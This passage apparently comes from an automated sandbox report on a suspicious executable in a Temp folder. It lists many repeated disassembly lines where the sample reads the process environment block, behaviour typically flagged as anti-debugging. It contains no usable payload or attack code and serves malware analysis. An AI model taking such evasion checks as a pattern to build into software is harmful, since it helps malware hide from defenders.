        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h]3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h]3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h]3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h]3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h]3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF38A mov eax, dword ptr fs:[00000030h]3_2_32DFF38A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBC3B0 mov eax, dword ptr fs:[00000030h]3_2_32DBC3B0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D493A6 mov eax, dword ptr fs:[00000030h]3_2_32D493A6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D493A6 mov eax, dword ptr fs:[00000030h]3_2_32D493A6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D38347 mov eax, dword ptr fs:[00000030h]3_2_32D38347
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D38347 mov eax, dword ptr fs:[00000030h]3_2_32D38347
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D38347 mov eax, dword ptr fs:[00000030h]3_2_32D38347
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h]3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h]3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h]3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h]3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6237A mov eax, dword ptr fs:[00000030h]3_2_32D6237A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC0371 mov eax, dword ptr fs:[00000030h]3_2_32DC0371
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC0371 mov eax, dword ptr fs:[00000030h]3_2_32DC0371
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h]3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h]3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h]3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h]3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h]3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h]3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h]3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5E310 mov eax, dword ptr fs:[00000030h]3_2_32D5E310
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5E310 mov eax, dword ptr fs:[00000030h]3_2_32D5E310
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5E310 mov eax, dword ptr fs:[00000030h]3_2_32D5E310
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7631F mov eax, dword ptr fs:[00000030h]3_2_32D7631F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D39303 mov eax, dword ptr fs:[00000030h]3_2_32D39303
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D39303 mov eax, dword ptr fs:[00000030h]3_2_32D39303
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h]3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h]3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h]3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h]3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF30A mov eax, dword ptr fs:[00000030h]3_2_32DFF30A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E13336 mov eax, dword ptr fs:[00000030h]3_2_32E13336
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D78322 mov eax, dword ptr fs:[00000030h]3_2_32D78322
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D78322 mov eax, dword ptr fs:[00000030h]3_2_32D78322
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D78322 mov eax, dword ptr fs:[00000030h]3_2_32D78322
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3E328 mov eax, dword ptr fs:[00000030h]3_2_32D3E328
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3E328 mov eax, dword ptr fs:[00000030h]3_2_32D3E328
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3E328 mov eax, dword ptr fs:[00000030h]3_2_32D3E328
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6332D mov eax, dword ptr fs:[00000030h]3_2_32D6332D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5B0D0 mov eax, dword ptr fs:[00000030h]3_2_32D5B0D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h]3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h]3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h]3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h]3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3C0F6 mov eax, dword ptr fs:[00000030h]3_2_32D3C0F6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7D0F0 mov eax, dword ptr fs:[00000030h]3_2_32D7D0F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7D0F0 mov ecx, dword ptr fs:[00000030h]3_2_32D7D0F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h]3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h]3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h]3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h]3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A093 mov ecx, dword ptr fs:[00000030h]3_2_32D3A093
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3C090 mov eax, dword ptr fs:[00000030h]3_2_32D3C090
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E150B7 mov eax, dword ptr fs:[00000030h]3_2_32E150B7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h]3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h]3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h]3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h]3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h]3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h]3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h]3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFB0AF mov eax, dword ptr fs:[00000030h]3_2_32DFB0AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h]3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h]3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h]3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h]3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h]3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h]3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h]3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D800A5 mov eax, dword ptr fs:[00000030h]3_2_32D800A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D41051 mov eax, dword ptr fs:[00000030h]3_2_32D41051
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D41051 mov eax, dword ptr fs:[00000030h]3_2_32D41051
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D70044 mov eax, dword ptr fs:[00000030h]3_2_32D70044
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D46074 mov eax, dword ptr fs:[00000030h]3_2_32D46074
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D46074 mov eax, dword ptr fs:[00000030h]3_2_32D46074
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D47072 mov eax, dword ptr fs:[00000030h]3_2_32D47072
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1505B mov eax, dword ptr fs:[00000030h]3_2_32E1505B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DE9060 mov eax, dword ptr fs:[00000030h]3_2_32DE9060
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D65004 mov eax, dword ptr fs:[00000030h]3_2_32D65004
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D65004 mov ecx, dword ptr fs:[00000030h]3_2_32D65004
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D48009 mov eax, dword ptr fs:[00000030h]3_2_32D48009
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3D02D mov eax, dword ptr fs:[00000030h]3_2_32D3D02D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E081EE mov eax, dword ptr fs:[00000030h]3_2_32E081EE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E081EE mov eax, dword ptr fs:[00000030h]3_2_32E081EE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501C0 mov eax, dword ptr fs:[00000030h]3_2_32D501C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501C0 mov eax, dword ptr fs:[00000030h]3_2_32D501C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D391F0 mov eax, dword ptr fs:[00000030h]3_2_32D391F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D391F0 mov eax, dword ptr fs:[00000030h]3_2_32D391F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501F1 mov eax, dword ptr fs:[00000030h]3_2_32D501F1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501F1 mov eax, dword ptr fs:[00000030h]3_2_32D501F1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501F1 mov eax, dword ptr fs:[00000030h]3_2_32D501F1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6F1F0 mov eax, dword ptr fs:[00000030h]3_2_32D6F1F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6F1F0 mov eax, dword ptr fs:[00000030h]3_2_32D6F1F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D491E5 mov eax, dword ptr fs:[00000030h]3_2_32D491E5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D491E5 mov eax, dword ptr fs:[00000030h]3_2_32D491E5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D381EB mov eax, dword ptr fs:[00000030h]3_2_32D381EB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D69194 mov eax, dword ptr fs:[00000030h]3_2_32D69194
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D81190 mov eax, dword ptr fs:[00000030h]3_2_32D81190
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D81190 mov eax, dword ptr fs:[00000030h]3_2_32D81190
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D44180 mov eax, dword ptr fs:[00000030h]3_2_32D44180
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D44180 mov eax, dword ptr fs:[00000030h]3_2_32D44180
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D44180 mov eax, dword ptr fs:[00000030h]3_2_32D44180
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E151B6 mov eax, dword ptr fs:[00000030h]3_2_32E151B6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D731BE mov eax, dword ptr fs:[00000030h]3_2_32D731BE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D731BE mov eax, dword ptr fs:[00000030h]3_2_32D731BE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D741BB mov ecx, dword ptr fs:[00000030h]3_2_32D741BB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D741BB mov eax, dword ptr fs:[00000030h]3_2_32D741BB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D741BB mov eax, dword ptr fs:[00000030h]3_2_32D741BB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E1A4 mov eax, dword ptr fs:[00000030h]3_2_32D7E1A4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E1A4 mov eax, dword ptr fs:[00000030h]3_2_32D7E1A4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7415F mov eax, dword ptr fs:[00000030h]3_2_32D7415F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A147 mov eax, dword ptr fs:[00000030h]3_2_32D3A147
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A147 mov eax, dword ptr fs:[00000030h]3_2_32D3A147
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A147 mov eax, dword ptr fs:[00000030h]3_2_32D3A147
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D9717A mov eax, dword ptr fs:[00000030h]3_2_32D9717A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D9717A mov eax, dword ptr fs:[00000030h]3_2_32D9717A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E15149 mov eax, dword ptr fs:[00000030h]3_2_32E15149
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D46179 mov eax, dword ptr fs:[00000030h]3_2_32D46179
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E13157 mov eax, dword ptr fs:[00000030h]3_2_32E13157
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E13157 mov eax, dword ptr fs:[00000030h]3_2_32E13157
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E13157 mov eax, dword ptr fs:[00000030h]3_2_32E13157
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D70118 mov eax, dword ptr fs:[00000030h]3_2_32D70118
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4510D mov eax, dword ptr fs:[00000030h]3_2_32D4510D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF13E mov eax, dword ptr fs:[00000030h]3_2_32DFF13E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D77128 mov eax, dword ptr fs:[00000030h]3_2_32D77128
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D77128 mov eax, dword ptr fs:[00000030h]3_2_32D77128
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6D6D0 mov eax, dword ptr fs:[00000030h]3_2_32D6D6D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D406CF mov eax, dword ptr fs:[00000030h]3_2_32D406CF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DE86C2 mov eax, dword ptr fs:[00000030h]3_2_32DE86C2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0A6C0 mov eax, dword ptr fs:[00000030h]3_2_32E0A6C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBC6F2 mov eax, dword ptr fs:[00000030h]3_2_32DBC6F2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBC6F2 mov eax, dword ptr fs:[00000030h]3_2_32DBC6F2
